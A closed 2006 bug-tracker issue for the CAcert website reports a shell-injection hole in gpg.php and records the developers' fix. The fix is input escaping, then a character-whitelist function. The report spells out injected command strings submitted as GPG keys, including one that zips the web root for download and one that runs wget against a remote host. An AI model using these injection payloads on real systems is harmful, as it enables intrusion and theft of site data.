View Issue Details

IDProjectCategoryView StatusLast Update
0000245Main CAcert WebsiteGPG/PGPpublic2013-11-20 22:23
ReporterTheSourcerer Assigned To 
PrioritynormalSeverityblockReproducibilityalways
Status closedResolutionfixed 
Fixed in Version2006 
Summary0000245: Shell escape
DescriptionThe following GPG keys can be used to exploit a hole in the system:

   "; echo "Hi" >/tmp/test ; echo "

   "; zip -r /www/www/leak.zip /www ; echo "

   " ; wget http://www2.futureware.at/HoleInOne ; echo "

results in the following request:

72.36.210.246 - - [28/May/2006:00:29:34 +0200] "GET /HoleInOne HTTP/1.0" 404 1051 "-" "Wget/1.10.2"


The hole is in the www/gpg.php line 45
TagsNo tags attached.
Reviewed by
Test Instructions

Relationships

related to 0000148 closed site shouldn't rely on magic_quotes_gpc turned on 

Activities

bluec

2006-05-28 22:06

manager   ~0000234

This exploit was not possible some weeks ago. Updating the php might have introduced configuration changes.

Seems to me as if magic_quotes_gpc has been turned off (thats Debian default) or magic_quotes_sybase as been turn on aswell (which would break the functionallity of magic_quotes_gpc).

Possible solution:

1. turn on magic_quotes_gpc in php configuration
2. make sure magic_quotes_sybase is turned off
3. add something like

  function check_quotes($value)
  {
    return ((!get_magic_quotes_gpc()) ? addslashes($value) : $value);
  }

duane

2006-05-28 23:13

developer   ~0000235

Line 44 actually...

- $gpgkey = $_POST['CSR'];
+ $gpgkey = escapeshellarg($_POST['CSR']);

duane

2006-05-28 23:55

developer   ~0000236

Last edited: 2006-05-29 00:03

escapeshellarg breaks gpg keys, instead a new functions was created to only allow base64 chars...

        function clean_csr($CSR)
        {
                 return(preg_replace("/[^A-Za-z0-9\n\r\-\:\=\+\/ ]/","",$CSR));
        }

$gpgkey = clean_csr(stripslashes($_REQUEST['CSR']));

Issue History

Date Modified Username Field Change
2006-05-28 21:15 TheSourcerer New Issue
2006-05-28 21:51 bluec Relationship added related to 0000148
2006-05-28 22:06 bluec Note Added: 0000234
2006-05-28 23:13 duane Note Added: 0000235
2006-05-28 23:55 duane Note Added: 0000236
2006-05-28 23:56 duane Status new => closed
2006-05-28 23:56 duane Resolution open => fixed
2006-05-28 23:56 duane Fixed in Version => production
2006-05-29 00:03 duane Note Edited: 0000236
2013-01-14 08:46 Werner Dworak Fixed in Version => 2006
2013-11-20 22:23 NEOatNHNG View Status private => public